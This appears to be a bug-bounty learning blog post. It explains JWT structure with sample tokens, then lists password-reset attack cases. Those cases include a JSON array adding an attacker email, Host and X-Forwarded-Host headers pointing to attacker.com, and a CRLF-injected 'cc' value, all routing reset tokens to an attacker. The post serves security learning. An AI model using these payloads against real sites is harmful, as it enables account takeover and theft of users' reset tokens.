Day 21/100 Hack and Improvement

2 minute read

Day 21 comes with JWT tokens and cool forgotten password functions!

Json Web Token (JWT)

From Rajesh Ranjan. JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. The JWT consist of three main parts separated by dots (.)

A simple JWT will look like:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

So the first part i.e eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 is Header, second part i.e eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ is Payload and the third part i.e SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c is signature.

The first part consist of two things; the type of the token which is JWT, and the algorithm being used such as RSA, HMAC, or SHA256. PS! If you don’t define the algorithm, it uses HS256 by default.

{
"alg": "HS256",
"typ": "JWT"
}

Payload

The second part is the actual data, we can also add additional information known as claims which is optional such as the expiration time (exp), subject (sub), or issuer (iss). Notice the claim names are short, that is because JWT is meant to be compact for fast requests. Don’t put sensitive data such as password in your payload thus this can easily be decoded.

{
"sub": "2311",
"name": "Mike Tyson",
"admin": true
}

Signature

The last part is the signature which is the sum of the encoded header, the encoded payload, a secret, and lastly the algorithm which is specified in the header. The signature is the most important part of the JWT structure. The header and payload can easily be decoded, but not the signature. The reason why is because it checks two things; first verify the header and payload has not been altered, and secondly check the private key is valid to make sure the sender is who it is

Cool Forgot Password functions

From Sam (CoffeeJunkie). Everyone in the internet world has experienced a moment with the “forgot password” function which can be very useful for attackers in order to achieve account take overs!

Cases where “forgot password function can be manipulated”

Case 1

By the usage of json in the post request, a normal reset password should look like this.

{"email":"victim@domain.com"}

An attacker can manipulate the json by making it look as a list with the following change.

{"email":["victim@domain.com","attacker@evil.com"]}

Therefore, the attacker will have a pretty good chance to receive the email if there is not a correct validation in the server side.

Case 2

If the target site allows header injection, the attacker can add the following headers in the request in order to obtain the token in the attackers server. This is the first case with a simple host header injection where the token should go to the attackers location.

Host: domain.com
Host: attacker.com

The other scenario comes where the attacker is able to inject a X-Forwarded-Host in the header of the request. In this case, the request and the token should be forwarded to the attackers side.

Host: domain.com 
X-Forwarded-Host: attacker.com 

Case 3

Depending on the case and the content type that the request is using, the attacker might be able to test the following parameters.

email="victim@mail.tld%0a%0dcc:attacker@mail.tld"

Where the attacker should be able to receive the victims email as well.

Leave a comment